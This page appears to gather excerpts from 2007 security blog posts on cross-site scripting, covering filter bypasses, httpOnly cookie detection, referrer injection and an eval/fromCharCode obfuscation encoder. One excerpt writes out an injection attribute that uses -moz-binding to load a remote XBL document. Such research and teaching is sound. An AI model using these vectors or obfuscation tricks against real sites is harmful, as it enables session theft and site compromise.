kishord today presents a tool, called XSS in eXceSS and hosted by .mario that will allow you test attack vectors against a page in different contexts. On top of that it also incorporates PHP IDS, allowing you to skip whichever rules you choose. From kishord's post: Good stuff! XSS in eXceSS: A "learn-XSS tool" was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.
Just a quick note to point out this invaluable resource for those interested in XSS attack vectors; rsnake's XSS Cheat Sheet. XSS Cheat Sheet was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.
For those who haven't yet seen this, .mario and christ1an over at sla.ckers has been working on a PHP Intrusion Detection System and the results are fairly promising! The system is based on regular expressions and seems to catch everything I've jammed into it so far.
Here is a nice tool for encoding JavaScript into eval(String.fromCharCode(x,x,x)) format. A full HTML page is listed here, or you can try it out live at the bottom of this post. {% highlight html %} Javascript Eval Encoder function encode_to_javascript() { var input = document.getElementById('inputtext').value; var output = 'eval(String.fromCharCode('; for(pos = 0; pos < input.length;
pdp has an interesting post from last month about amendments to the British Computer Misuse Act that specify the illegality of "making, supplying or obtaining articles for use in computer misuse offences". Time to make a "terms and conditions" for this site. Amendments to the British Computer Misuse Act was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.
ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input: {% highlight html %} {% endhighlight %} Turns out that IE will still process attributes on closing tags which circumvents the filter for <a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex.
Admittedly of limited use, here is a JavaScript function I wrote to detect the presence of httpOnly cookies. In Firefox the function will overwrite the real value of the cookie, so before using this function it is vital to try and read the cookie normally! Here is the script embedded in a test PHP page. {% highlight html %} HTTPOnly Cookie Test function testcookie(cookiename) { document.cookie = cookiename + '=new_value;
A proposed extension to the currently supported set of ...Request objects is JSONRequest, interesting from a security point of view because the proponents of the project wish to allow JSONRequest to violate the Same Origin Policy. This post will give a brief overview of the security features toted by JSONRequest and of how they potentially could allow an attacker to compromise a site more effectively.
Many sites use JavaScript methods to inject a hidden form field into 404 pages to trace the original page that points to the invalid link. An example of this can be found at http://www.yaldex.com/FSPageDetails/_404Referrer.htm. The attentive observer will spot that this method of writing the field injects the HTTP referrer directly into the page without any sanitization. So what?
Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context. The process works as follows: Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />. Browser loads XBL document.